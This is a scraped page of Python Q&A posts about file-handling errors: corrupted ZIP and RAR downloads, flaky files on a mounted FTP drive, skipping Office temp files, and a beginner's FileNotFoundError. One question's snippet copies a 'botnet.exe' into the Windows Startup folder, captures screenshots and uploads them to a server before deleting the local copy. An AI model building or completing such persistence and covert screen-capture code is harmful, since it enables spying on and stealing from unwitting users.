Eror BadZipFile inconsistently raised - python

I am using selenium to successively download a number of ZIP files which I subsequently rename and unzip.
os.rename(F"C:/Users/Info/Desktop/PR RAW 3000/Test.ZIP", F"C:/Users/Info/Desktop/PR RAW 3000/12345.ZIP") ##Rename downloaded file
time.sleep(2)
#Unzip File
target_zip = F"C:/Users/Info/Desktop/PR RAW 3000/12345.ZIP"
os.mkdir(F'C:/Users/Info/Desktop/PR RAW 3000/12345_Sample') ##Create path
handle = zipfile.ZipFile(target_zip)
handle.extractall(F'C:/Users/Info/Desktop/PR RAW 3000/12345_Sample') ##Unzip file into created path
handle.close()
The code works just fine most of the time. Sometimes though, the error BadZipFile: File is not a zip file is raised and I have no idea why. The error pops up inconsistently, meaning that when the code breaks at one specific file, after restarting it runs smoothly through the point where it previously has failed.

Related

RAR files not downloading correctly using requests module

Recently, I was creating an installer for my project. It involves downloading a RAR file from my server, unRAR-ing it and putting those folders into the correct locations.
Once it's downloaded, the program is supposed to unRAR it, but instead it gives me an error in the console: Corrupt header of file.
I should note that this error is coming from the unRAR program bundled with WinRAR.
I also tried opening the file using the GUI of WinRAR, and it gave the same error.
I'm assuming while it's being downloaded, it's being corrupted somehow?
Also, when I download it manually using a web browser, it downloads fine.
I've tried this code:
KALI = "URL CENSORED"
kali_res = requests.get(KALI, stream=True)
for chunk in kali_res.iter_content(chunk_size=128):
open(file_path, "wb").write(chunk)
..but it still gives the same error.
Could someone please help?
You keep re-opening the file for every chunk.
Not only does this leak file descriptors, it also means you keep overwriting the file.
Try this instead:
KALI = "URL CENSORED"
kali_res = requests.get(KALI, stream=True)
with open(file_path, "wb") as outfile:
for chunk in kali_res.iter_content(chunk_size=128):
outfile.write(chunk)

Intermittent "No such file or directory" and permission errors when opening files (in a loop) on mounted FTP drive (linux)? Sync issue?

Getting errors like
FileNotFoundError: [Errno 2] No such file or directory: '/path/to/files/file.pdf'
when trying to loop through and open files in a mounted FTP drive (mounted via curlftpfs 'myuser:mypassword'#MY.SERVER.IP /path/to/files). I suspect sync issues, as the mounted drive is from another server on our network.
I can see that the file is there, can open it manually, can ls '/path/to/files/file.pdf' to see the file, but when executing...
FILES = os.listdir('/path/to/files')
FILES.sort()
.
.
.
for file in FILES:
with open(os.path.join('/path/to/files', 'file.pdf'), 'rb') as fd:
do stuff
... I sometimes get the FileNotFOundError.
More confusing, I can actually open this file (using the same path string that the error message tells me is not a file or directory) separately by just starting a python interactive shell and run something like...
fd = open('/path/to/files/file.pdf', 'rb')
fd.read()
...so IDK what the issue could be when reading it in a list of files.
Any debugging ideas or ideas of what could be causing this? Could there be some kind of timing/sync issues between reading the files on the mounted FTP drive vs the script that is running locally (and how to fix)?
* UPDATE:
Oddly, printing the target path before trying to open the file like...
print(os.path.join('/path/to/files', 'file.pdf'))
time.sleep(2) # giving even more time after initial access
with open(os.path.join('/path/to/files', 'file.pdf'), 'rb') as fd:
do stuff
...seems to help (kinda). Now also randomly throws PermissionErrors for random files that I had no problem reading before (still occasionally throws FileNotFoundErrors) and that I can actually open when accessing individually in python interactive shell. Makes me moreso think it is some kind of sync issue. Will need to investigate more.
It seems that os.path is a module, it will return an error if you use it like os.path('/path/to/files/file.pdf')
But I think it's not the cause of FileNotFOundError.

PIL raises .png Key Error after exe file is moved to another directory

I've written a script that after execution, moves (using shutil.move()) it's exe file (I created the "onefile" exe using pyinstaller) to another direction (Exe get's deleted from the original directory and moves to another directory) takes a screenshot and saves it somewhere. but the problem is that it won't take the screenshot and raises a ValueError saying ValueError: unknown file extension: .png along with a KeyError KeyError: 'PNG' While using copy2 method does not raise these error and the screenshot is captured (But this is not what i want, i want the file to be deleted from it's original directory)
But when the script is run in it's original .py format (not packaged into one exe file), everything works fine, .py file moves to another location and the screenshot is captured.
Why is this happening with the move method? What is the solution?
Here is my snippet (username is already properly defined):
if not path.exists("C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\botnet.exe".format(username)):
filePy = path.realpath(__file__)
filepathexe = filePy.replace(".py", ".exe")
shutil.move(filepathexe, "C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup".format(username)) ##shutil.copy2 works fine
def takess():
pyautogui.screenshot("C:\\Users\\%s\\scrn.png"%username)
# after capturing the screenshot, it is uploaded to a server
data = open('C:\\Users\%s\\scrn.png'%username, 'rb') #data is uploaded to a server
remove('C:\\Users\\%s\\scrn.png'%username) # removing the screenshot png file
I believe the part of my code which reads the file as binary and sends it to a server and then deletes it, works fine because the screenshot is never captured. ( as i said executing the original .py file or using shutil.copt2() solves the issue)

Ignore "temp" files?

I've had a script for a while that has been running without issues however recently had a "hitch" with a temporary file that was within a directory.
The file in question started with '~$' on a windows PC so the script was erroring out on this file as it is not a proper DOCX file. The file in question was not open and occurred after being transferred of a network drive onto an external hard drive. Checking the destination drive (with hidden files on etc) did not show this file either.
I have attempted a quick fix off:
for (dirpath,dirnames,filenames) in os.walk('.'):
for filename in filenames:
if filename.endswith('.docx'):
filesList.append(os.path.join(dirpath,filename))
for file in filesList:
if file.startswith('~$'):
pass
else:
<rest of script>
However the script appears to be ignoring this to proceed then error out again, as the file is not "valid".
Does anyone know either why this isn't working or a quick solution to get it to ignore any files that are like this? I would attempt a if exists, however the file technically does exist so this wouldn't work either.
Sorry if its a bit stupid, but I am a bit stumped as to A. why its there and B. how to code around it.
In the second code block, your variable file contains the whole file path, not just the file name.
Instead skip the "bad" files in your first block instead of appending to the list:
for (dirpath,dirnames,filenames) in os.walk('.'):
for filename in filenames:
if filename.endswith('.docx'):
if not filename.startswith('~$'):
filesList.append(os.path.join(dirpath,filename))
The other option would be to check os.path.basename(file) in your second code block.

filenotfound error python (running through atom)

I'm working my way through the python crash course pdf. Everything was going well until I hit chapter 10 "files and exceptions".
The task is very simple.
1) create a text file "pi_digits.txt" that contains the first 30 digits of pi.
2) run the following code:
with open('pi_digits.txt') as file_object:
contents = file_object.read()
print(contents)
I keep getting a filenotfounderror [errno 2].
I have tried using the full file path, placing the file in the same ~.atom folder that contains the package 'script'.
I tried to run the file through a terminal and got the same error message.
I also searched stackoverflow for solutions and did find similar problems but the answers did not work.
Any help would be appreciated.
Prepend this:
import os
print(os.getcwd())
os.chdir('/tmp')
and copy the .txt file to /tmp. Also, be sure the copied filename is all lowercase, to match your program.

Categories